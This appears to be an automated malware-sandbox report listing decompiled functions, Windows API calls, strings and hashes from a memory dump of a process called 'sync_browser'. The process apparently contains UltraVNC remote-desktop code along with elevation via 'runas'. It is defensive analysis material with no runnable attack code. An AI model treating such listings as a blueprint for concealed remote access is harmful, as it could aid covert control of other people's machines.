Instruction ID: 088da45625a9da59856040a0c0b9d0e8cfda859ca17fbc55d8bd6c9075ab6aa6
Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
Instruction Fuzzy Hash: 13A1CF22A0C681C5E751FB25D4587FEABA1EB85B44F99403ADA4C477B9CF39F884C720

Function 00007FF74002BD70 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400BA220: _errno.LIBCMT ref: 00007FF7400BA168
Part of subcall function 00007FF7400BA220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400BA173

GetTempPathA.KERNEL32 ref: 00007FF74002BDFD
sprintf.LIBCMT ref: 00007FF74002BF6C

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

GlobalAlloc.KERNEL32 ref: 00007FF74002BFFF

Strings

.zip, xrefs: 00007FF74002BF3B
!UVNCDIR-, xrefs: 00007FF74002BF50
%s%s%s%s, xrefs: 00007FF74002BF5E
\*.*, xrefs: 00007FF74002BFDC

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
API String ID: 3897446562-3886131270
Opcode ID: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
Instruction ID: b55cfbc40290291a517126f2b9a2d142417ebc498ae4c5a7301be577ce2b8b32
Opcode Fuzzy Hash: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
Instruction Fuzzy Hash: 69818D22618B8599EB10EB74D4403EDB760FB457A4F904336EAAD13BE9DF78E506C720

Function 00007FF74006A3B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF74006A3E3
GetThreadDesktop.USER32 ref: 00007FF74006A3EB
GetUserObjectInformationA.USER32 ref: 00007FF74006A411
SetThreadDesktop.USER32 ref: 00007FF74006A471

Strings

vncservice.cpp : !GetUserObjectInformation , xrefs: 00007FF74006A424
vncservice.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF74006A458
vncservice.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF74006A47B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Thread$Desktop$CurrentInformationObjectUser
String ID: vncservice.cpp : !GetUserObjectInformation $vncservice.cpp : SelectHDESK to %s (%x) from %x$vncservice.cpp : SelectHDESK:!SetThreadDesktop
API String ID: 3041254040-2700308907
Opcode ID: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
Instruction ID: 1c1737eb8e9ac4a2232560b8b3d09b57ccdeff40bc7108dcbb9b830c64733692
Opcode Fuzzy Hash: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
Instruction Fuzzy Hash: DC21F975A0CA82C1EA61BB61B8483FAB3A5FF89744FC40432D58E46769DE7CF155CB20

Function 00007FF740013D50 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF740013D7C
GetModuleFileNameA.KERNEL32 ref: 00007FF740013D9C
GetForegroundWindow.USER32 ref: 00007FF740013DAB
ShellExecuteExA.SHELL32 ref: 00007FF740013DFA

Strings

p, xrefs: 00007FF740013DA2
runas, xrefs: 00007FF740013DB6
-delsoftwarecad, xrefs: 00007FF740013DDD

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellVersionWindow
String ID: -delsoftwarecad$p$runas
API String ID: 397093096-3343046257
Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
Instruction ID: ce4a99fe826d93f562eff00930ff27bba5964ee1ad091798ebc7833e32dfe068
Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
Instruction Fuzzy Hash: 5111A83551CB81C5E770AB50F49939AB7A4FB88745F800235E68D02B69DF7DE158CB60

Function 00007FF740013E20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF740013E4C
GetModuleFileNameA.KERNEL32 ref: 00007FF740013E6C
GetForegroundWindow.USER32 ref: 00007FF740013E7B
ShellExecuteExA.SHELL32 ref: 00007FF740013ECA

Strings

runas, xrefs: 00007FF740013E86
-softwarecad, xrefs: 00007FF740013EAD
p, xrefs: 00007FF740013E72

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExecuteFileForegroundModuleNameShellVersionWindow
String ID: -softwarecad$p$runas
API String ID: 397093096-2208381721
Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
Instruction ID: 725d8d255b90e7137603558d9fa2fd8cec7f4fe8d5399a3f28c82e17d07243bb
Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
Instruction Fuzzy Hash: 4311A83551CB81C5E770AB50F49939AB7A4FB88745F800235D68D02B69DF7DE158CB50

Function 00007FF740097400 Relevance: 12.1, APIs: 8, Instructions: 62synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF740097320: TlsGetValue.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF740097338
Part of subcall function 00007FF740097320: EnterCriticalSection.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF740097352
Part of subcall function 00007FF740097320: LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF740097423), ref: 00007FF7400973E3

EnterCriticalSection.KERNEL32 ref: 00007FF740097427
LeaveCriticalSection.KERNEL32 ref: 00007FF740097472
LeaveCriticalSection.KERNEL32 ref: 00007FF74009747B
WaitForSingleObject.KERNEL32 ref: 00007FF74009748A
EnterCriticalSection.KERNEL32 ref: 00007FF740097495
GetLastError.KERNEL32 ref: 00007FF7400974A7
EnterCriticalSection.KERNEL32 ref: 00007FF7400974DE
LeaveCriticalSection.KERNEL32 ref: 00007FF740097500

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleValueWait
String ID:
API String ID: 3883107862-0
Opcode ID: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
Instruction ID: 76e165f88c7e568ca84d08f30fa52797bf8c57f6eed34f32a2647bf05cfde130
Opcode Fuzzy Hash: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
Instruction Fuzzy Hash: 9D311636A1CB46C2EB10BF20E4443A9B3A4FB88B94F844131DA9D43769CF3CE599C720

Function 00007FF7400C9A94 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 240COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7400C37C4: GetLastError.KERNEL32(?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400C37CE
Part of subcall function 00007FF7400C37C4: FlsGetValue.KERNEL32(?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400C37DC
Part of subcall function 00007FF7400C37C4: FlsSetValue.KERNEL32(?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400C3808
Part of subcall function 00007FF7400C37C4: GetCurrentThreadId.KERNEL32 ref: 00007FF7400C381C
Part of subcall function 00007FF7400C37C4: SetLastError.KERNEL32(?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19,?,?,?,00007FF7400B748C), ref: 00007FF7400C3834

Part of subcall function 00007FF7400C32EC: Sleep.KERNEL32(?,?,?,00007FF7400C37F7,?,?,?,00007FF7400BFFD1,?,?,?,?,00007FF7400B8C19), ref: 00007FF7400C3331

_errno.LIBCMT ref: 00007FF7400C9D9C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C9DA7

Strings

gfff, xrefs: 00007FF7400C9C4C
JanFebMarAprMayJunJulAugSepOctNovDec, xrefs: 00007FF7400C9BF4
;, xrefs: 00007FF7400C9B46
;, xrefs: 00007FF7400C9B33

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
API String ID: 1962487656-880385205
Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
Instruction ID: 5114fae920286c120a1b074a2beee3788c827b088232230df5acafb639c5f60a
Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
Instruction Fuzzy Hash: A691F73360C181CBEB0DAE38D4987A8BBA1D761704F49C135DA498B7AADF39F509C761

Function 00007FF74000CDC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF74000CDF5

Part of subcall function 00007FF74000B550: inet_ntoa.WS2_32 ref: 00007FF74000B59C
Part of subcall function 00007FF74000B550: inet_ntoa.WS2_32 ref: 00007FF74000B5B8
Part of subcall function 00007FF74000B550: free.LIBCMT ref: 00007FF74000B5CC
Part of subcall function 00007FF74000B550: free.LIBCMT ref: 00007FF74000B5D4
Part of subcall function 00007FF74000B550: _wgetenv.LIBCMT ref: 00007FF74000B60D

Part of subcall function 00007FF74000B8C0: inet_addr.WS2_32 ref: 00007FF74000B9C2
Part of subcall function 00007FF74000B8C0: htons.WS2_32 ref: 00007FF74000B9FE
Part of subcall function 00007FF74000B8C0: socket.WS2_32 ref: 00007FF74000BA13
Part of subcall function 00007FF74000B8C0: connect.WS2_32 ref: 00007FF74000BA2A

inet_addr.WS2_32 ref: 00007FF74000CEA8
gethostbyname.WS2_32 ref: 00007FF74000CEB6
closesocket.WS2_32 ref: 00007FF74000CF0A
closesocket.WS2_32 ref: 00007FF74000CF18

Strings

0123456789., xrefs: 00007FF74000CE73

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
String ID: 0123456789.
API String ID: 1515065793-2088042752
Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
Instruction ID: f18db247834ac0ed752afc1c86fbc85b4522780bb850b646180f7a9be36155c2
Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
Instruction Fuzzy Hash: EA414461A1D682C6EB74BF21A8046F9A261FF48BA5F844231DD1E477EDEE3CF5448321

Function 00007FF74001E320 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF74001E37F

Part of subcall function 00007FF7400B7978: malloc.LIBCMT ref: 00007FF7400B7992

InitializeCriticalSection.KERNEL32 ref: 00007FF74001E3B1

Part of subcall function 00007FF7400C2950: RaiseException.KERNEL32 ref: 00007FF7400C29CB

InitializeCriticalSection.KERNEL32 ref: 00007FF74001E3F9
LeaveCriticalSection.KERNEL32 ref: 00007FF74001E462
LeaveCriticalSection.KERNEL32 ref: 00007FF74001E48A

Strings

P, xrefs: 00007FF74001E374
vncclient.cpp : init update thread, xrefs: 00007FF74001E344

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$InitializeLeave$EnterExceptionRaisemalloc
String ID: P$vncclient.cpp : init update thread
API String ID: 1414418286-2218817233
Opcode ID: ddfed08e363cca9923913227180b1ae3d8e90c93c992078c94d7733d39bccdf3
Instruction ID: c78879341de626f1350b0b9d2c01b5ab6443716373ba235faa837e9f294d158d
Opcode Fuzzy Hash: ddfed08e363cca9923913227180b1ae3d8e90c93c992078c94d7733d39bccdf3
Instruction Fuzzy Hash: B941273261DB81C6E658AF61E4443ADB3A0FB48B90F844135DB9E47BA8DF3CF4688710

Function 00007FF74002BBF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF74002BC2F
CloseHandle.KERNEL32 ref: 00007FF74002BCB3
DeleteFileA.KERNEL32 ref: 00007FF74002BD40
LeaveCriticalSection.KERNEL32 ref: 00007FF74002BD4A

Strings

!UVNCDIR-, xrefs: 00007FF74002BD1A
f, xrefs: 00007FF74002BC24

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterFileHandleLeave
String ID: !UVNCDIR-$f
API String ID: 753559762-4271271459
Opcode ID: 29944916d6d12298b1d8fc6fc50fe8c47ba2ebb8248a2f4b8993eced494bf57f
Instruction ID: 64ba6d8f56ef4c6a46f1807f6cd08d8cb69fda31d9b87d4d9f0c0e12623a9bf6
Opcode Fuzzy Hash: 29944916d6d12298b1d8fc6fc50fe8c47ba2ebb8248a2f4b8993eced494bf57f
Instruction Fuzzy Hash: 8E418221A0CA81C1EB50BF25E8543B967A0EF85BA4F940335DA6D4B7E9DF3CE4448721

Function 00007FF74000ACB0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

inet_addr.WS2_32 ref: 00007FF74000AD73
free.LIBCMT ref: 00007FF74000AD92

Strings

local, xrefs: 00007FF74000AD2B
both, xrefs: 00007FF74000ACF7
0123456789., xrefs: 00007FF74000AD45
remote, xrefs: 00007FF74000AD11

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: freeinet_addrmalloc
String ID: 0123456789.$both$local$remote
API String ID: 2387382576-3366603569
Opcode ID: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
Instruction ID: faba5c2fdfe780d4760eca1a99ba7da1ebdb2954cc4c1ddf86fae63c53f52b8d
Opcode Fuzzy Hash: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
Instruction Fuzzy Hash: C7219621A0C685C5F710BB11A910374B791FB497D0FD84131DA5E577EDDE6CF5818320

Function 00007FF7400BD58C Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7400BD5AF
_errno.LIBCMT ref: 00007FF7400BD5B7

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
Instruction ID: 55ada54f8d6b5d4ddfcbc8fc013ead817f7fce249d2c9d44ccc902e9268d548c
Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
Instruction Fuzzy Hash: A321CC22A1C642C6E2157BA4A84177DF630AF81761FC90236EA1C073FADE7CB841CB30

Function 00007FF740017220 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF740017249
fclose.LIBCMT ref: 00007FF7400172CE
ShellExecuteExA.SHELL32 ref: 00007FF74001732B

Strings

\uvnckeyboardhelper.exe, xrefs: 00007FF740017290
p, xrefs: 00007FF740017322
runas, xrefs: 00007FF7400172E5

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

